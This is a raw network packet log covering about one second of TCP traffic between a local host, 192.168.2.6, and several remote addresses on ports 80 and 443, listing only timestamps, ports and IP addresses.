Nov 23, 2024 07:09:41.176263094 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:41.176356077 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:41.182708979 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.199074030 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.199152946 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.199208975 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.199218988 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.199594975 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.200942993 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.206017971 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.206079006 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.206087112 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.212171078 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.212208986 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.212224960 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.212234020 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.212289095 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.219671011 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.226771116 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.226869106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.226881027 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.226892948 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.226903915 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.226914883 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.226942062 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.226957083 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.227030993 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.227116108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.227118969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.227133036 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.227168083 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.227168083 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.227247953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.227298975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.227336884 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.227368116 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.227379084 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.227385998 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.227437019 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.234812021 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.235523939 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.235578060 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.235665083 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.235707045 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.240741968 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.240761995 CET	443	49852	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.240798950 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:41.240825891 CET	443	49854	172.64.41.3	192.168.2.6
Nov 23, 2024 07:09:41.242424965 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.242599010 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.242605925 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.243767977 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.243829012 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.250022888 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.250085115 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.250092983 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.257545948 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.257644892 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.257651091 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.267256975 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.267291069 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.267328978 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.267337084 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.267425060 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.272582054 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.280216932 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.280278921 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.280287981 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.285636902 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.287906885 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.287981987 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.288002968 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.288009882 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.288517952 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.295475006 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.296428919 CET	49858	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.296478987 CET	443	49858	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.296564102 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.296596050 CET	49858	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.296776056 CET	49859	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.296812057 CET	443	49859	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.296921968 CET	49858	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.296935081 CET	49859	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.296947956 CET	443	49858	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.297264099 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297327995 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.297384977 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297532082 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297585011 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.297688007 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297766924 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297806978 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.297857046 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297941923 CET	49859	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.297956944 CET	443	49859	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.298064947 CET	49860	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.298096895 CET	443	49860	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.298157930 CET	49861	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.298177004 CET	443	49861	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.298254013 CET	49862	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.298281908 CET	443	49862	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.303143978 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.303179026 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.303199053 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.303219080 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.303452015 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.310520887 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.320848942 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.320900917 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.320902109 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.320913076 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.320951939 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.332634926 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.333843946 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.333940983 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.333949089 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.339373112 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.344510078 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.344549894 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.344578028 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.344587088 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.344630957 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.346364975 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.351286888 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.351349115 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.351361036 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.351404905 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.369590998 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.369636059 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.369662046 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.369671106 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.369720936 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.369728088 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.372817993 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.372872114 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.372879982 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.373722076 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.373776913 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.373784065 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.376463890 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.376532078 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.376662016 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:41.376673937 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:41.428030014 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.428085089 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.428113937 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.428139925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.432034969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.432091951 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.432094097 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.432137012 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.439981937 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.440051079 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.440072060 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.440116882 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.442698002 CET	49852	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.442850113 CET	49854	443	192.168.2.6	172.64.41.3
Nov 23, 2024 07:09:41.447993994 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.448040962 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.448070049 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.448107958 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.455893993 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.455939054 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.455941916 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.455979109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.456119061 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.456180096 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.456286907 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.456614017 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.456688881 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.456901073 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.459201097 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.459259033 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.459357977 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.460961103 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.461016893 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.461214066 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.463910103 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.463972092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.464003086 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.464045048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.468827963 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.468904972 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.468950987 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.471843958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.471892118 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.471968889 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.472011089 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.478574038 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.478586912 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.478598118 CET	49850	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.478605032 CET	443	49850	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.478662968 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.478662968 CET	49848	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.478667974 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.478677988 CET	443	49848	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.479872942 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.479877949 CET	49846	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.479909897 CET	443	49846	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.479939938 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.479953051 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.480004072 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.480299950 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.480299950 CET	49847	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.480319977 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.480331898 CET	443	49847	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.486743927 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.486759901 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.486769915 CET	49849	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.486774921 CET	443	49849	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.487879038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.488018036 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.488044977 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.488054037 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.495745897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.495793104 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.495845079 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.495909929 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.503715038 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.503855944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.512911081 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.512931108 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.513006926 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.514256954 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.514291048 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.514520884 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.518650055 CET	49863	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.518663883 CET	443	49863	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.518974066 CET	49864	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.518985033 CET	443	49864	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.530147076 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.530193090 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.530303001 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.530426979 CET	49865	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.530446053 CET	443	49865	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.532064915 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.532088995 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.532167912 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.532295942 CET	49866	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.532309055 CET	443	49866	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.533550024 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.533581972 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.533659935 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.533817053 CET	49867	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:41.533838987 CET	443	49867	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:41.552478075 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.552535057 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.552588940 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.552676916 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.556436062 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.556540012 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.629633904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.629668951 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.629695892 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.629709959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.632081985 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.632134914 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.632240057 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.632283926 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.637271881 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.637327909 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.637362003 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.637424946 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.642137051 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.642235994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.642256975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.642294884 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.647209883 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.647265911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.647296906 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.647355080 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.652265072 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.652321100 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.652350903 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.652375937 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.657320976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.657399893 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.657428980 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.657469034 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.662390947 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.662472963 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.662534952 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.665144920 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.667448044 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.667536974 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.667551041 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.667649984 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.672492981 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.672560930 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.672609091 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.672688007 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.677560091 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.677637100 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.677653074 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.677869081 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.682631969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.682729006 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.682755947 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.682852030 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.687053919 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.687118053 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.687150002 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.687186003 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.691406965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.691533089 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.691577911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.695751905 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.695794106 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.695807934 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.695831060 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.700150013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.700195074 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.700227022 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.700274944 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.704540968 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.704612970 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.704632998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.704777956 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.708832979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.708935976 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.708990097 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.713196039 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.713255882 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.713289022 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.713335037 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.717535019 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.717597008 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.717652082 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.717807055 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.721856117 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:41.721926928 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:41.740346909 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.740428925 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.740478039 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.740827084 CET	49853	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.740849972 CET	443	49853	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.741463900 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.741491079 CET	443	49868	162.159.61.3	192.168.2.6
Nov 23, 2024 07:09:41.741565943 CET	49868	443	192.168.2.6	162.159.61.3
Nov 23, 2024 07:09:41.741904020 CET	49868	443	192.168.2.6	162.159.61.3
